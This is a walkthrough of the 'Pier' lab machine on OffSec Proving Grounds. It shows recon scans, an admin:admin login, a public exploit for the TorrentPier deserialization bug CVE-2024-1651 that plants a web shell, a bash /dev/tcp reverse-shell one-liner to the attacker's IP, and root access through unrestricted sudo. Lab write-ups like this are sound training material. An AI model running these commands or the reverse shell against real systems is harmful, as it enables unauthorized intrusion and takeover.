Summary #
On port 80 there is an application called Torrentpier which has an insecure object deserialization vulnerability to obtain RCE (CVE-2024-1651). We’ll use this exploit to get initial access as the pier user. Once on the target, we check our sudo privileges and see we can run any command with sudo privileges, so we escalate to the root user, using the bash binary.
Specifications #
- Name: PIER
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Intermediate
- System overview: Linux pier 6.8.0-48-generic #48-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 27 14:04:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.201.190
- OFFSEC provided credentials: None
- HASH:
local.txt: None - HASH:
proof.txt:dfb3b7f7508bf37cffcc86ae2738fbc2
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir pier && cd pier && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Sep 7 09:54 .
drwxrwxr-x 57 kali kali 4096 Sep 7 09:54 ..
drwxrwxr-x 2 kali kali 4096 Sep 7 09:54 enum
drwxrwxr-x 2 kali kali 4096 Sep 7 09:54 exploits
drwxrwxr-x 2 kali kali 4096 Sep 7 09:54 files
drwxrwxr-x 2 kali kali 4096 Sep 7 09:54 tools
drwxrwxr-x 2 kali kali 4096 Sep 7 09:54 uploads
## set bash variable
ip=192.168.201.190
## ping target to check if it's online
ping $ip
PING 192.168.201.190 (192.168.201.190) 56(84) bytes of data.
64 bytes from 192.168.201.190: icmp_seq=1 ttl=61 time=17.0 ms
64 bytes from 192.168.201.190: icmp_seq=2 ttl=61 time=18.5 ms
^C
--- 192.168.201.190 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 16.997/17.767/18.537/0.770 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.201.190:22
Open 192.168.201.190:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-07 09:57 CEST
Initiating Ping Scan at 09:57
Scanning 192.168.201.190 [4 ports]
Completed Ping Scan at 09:57, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:57
Completed Parallel DNS resolution of 1 host. at 09:57, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:57
Scanning 192.168.201.190 [2 ports]
Discovered open port 80/tcp on 192.168.201.190
Discovered open port 22/tcp on 192.168.201.190
Completed SYN Stealth Scan at 09:57, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.201.190
Host is up, received echo-reply ttl 61 (0.017s latency).
Scanned at 2025-09-07 09:57:57 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGT2bbuknyDQCZL8wcewIxfJHCT3ZA9MHovHm5vV8gnY+WaklYD1KkExYX16RT7Du6kDkOd7/VtgT8wyumO7X74=
| 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9T+RtTpSheh2mjfbGIXvNadPVCLuheP1AqmUPx6yic
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.58 ((Ubuntu))
|_http-title: TorrentPier - Bull-powered BitTorrent tracker engine
| http-robots.txt: 9 disallowed entries
| /bt/* /dl.php /group.php /login.php /memberlist.php
|_/modcp.php /posting.php /privmsg.php /profile.php
|_http-favicon: Unknown favicon MD5: BEFC1D6C813F54B136FE1A3116C08700
|_http-generator: TorrentPier
|_http-server-header: Apache/2.4.58 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.58 ((Ubuntu))
|_http-title: TorrentPier - Bull-powered BitTorrent tracker engine
| http-robots.txt: 9 disallowed entries
| /bt/* /dl.php /group.php /login.php /memberlist.php
|_/modcp.php /posting.php /privmsg.php /profile.php
|_http-favicon: Unknown favicon MD5: BEFC1D6C813F54B136FE1A3116C08700
|_http-generator: TorrentPier
|_http-server-header: Apache/2.4.58 (Ubuntu)
When browsing to port 80 (http://192.168.201.190/) we find an application called Torrentpier.
When we try weak credentials, we can login the application using: admin:admin.
Searching for an exploit, we can find a insecure object deserialization to obtain RCE (https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC) (CVE-2024-1651) . When we run the exploit with the credentials, we get initial access as the pier user in the /var/www/html/data/uploads directory.
## change directory
cd files
## download exploit
wget https://raw.githubusercontent.com/Whiteh4tWolf/CVE-2024-1651-PoC/refs/heads/main/exploit.py
--2025-09-07 10:06:21-- https://raw.githubusercontent.com/Whiteh4tWolf/CVE-2024-1651-PoC/refs/heads/main/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4258 (4.2K) [text/plain]
Saving to: ‘exploit.py’
exploit.py 100%[===================================================================>] 4.16K --.-KB/s in 0.002s
2025-09-07 10:06:21 (1.95 MB/s) - ‘exploit.py’ saved [4258/4258]
## running the exploit
python3 exploit.py -u admin -p admin -s $ip -f 3
[+] login successful!
[+] bb_data = 'a%3A3%3A%7Bs%3A2%3A%22uk%22%3Bs%3A32%3A%22cCdBJEg0PfE3BfWh0Lwm1Ykup32u86dF%22%3Bs%3A3%3A%22uid%22%3Bi%3A2%3Bs%3A3%3A%22sid%22%3Bs%3A20%3A%22FXHRSCOCFsf6UtLRbCfA%22%3B%7D'
[+] generating deserialization Guzzle/FW1 payload
[+] RCE will be at http://192.168.201.190/data/uploads/glcccmqm.php
[+] shell uploaded!
[+] popping shell!
RCE>
## print current user
RCE> whoami
pier
## print current working directory
RCE> pwd
/var/www/html/data/uploads
Now let’s get a regular shell.
## get the local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.243/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::3398:8636:7076:1a77/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## setup a listener
nc -lvnp 9001
listening on [any] 9001 ...
## send the reverse shell command on the RCE shell
RCE> /bin/bash -c 'bash -i >& /dev/tcp/192.168.45.243/9001 0>&1'
## catch the reverse shell
nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.243] from (UNKNOWN) [192.168.201.190] 40580
bash: cannot set terminal process group (1564): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
pier@pier:/var/www/html/data/uploads$
To get a proper TTY we upgrade our shell using the script binary.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
pier@pier:/var/www/html/data/uploads$ export TERM=xterm && stty columns 200 rows 200
Privilege Escalation #
Checking the sudo privileges shows the pier user can run any command using sudo, without a password. So we can escalate our privileges to the root user, using the bash binary.
## print sudo privileges
pier@pier:/var/tmp$ sudo -l
Matching Defaults entries for pier on pier:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User pier may run the following commands on pier:
(ALL : ALL) NOPASSWD: ALL
## escalate privileges using `bash`
pier@pier:/var/tmp$ sudo bash -p
root@pier:/var/tmp#
## print `proof.txt`
root@pier:/var/tmp# cat /root/proof.txt
dfb3b7f7508bf37cffcc86ae2738fbc2
References #
[+] https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC
[+] https://raw.githubusercontent.com/Whiteh4tWolf/CVE-2024-1651-PoC/refs/heads/main/exploit.py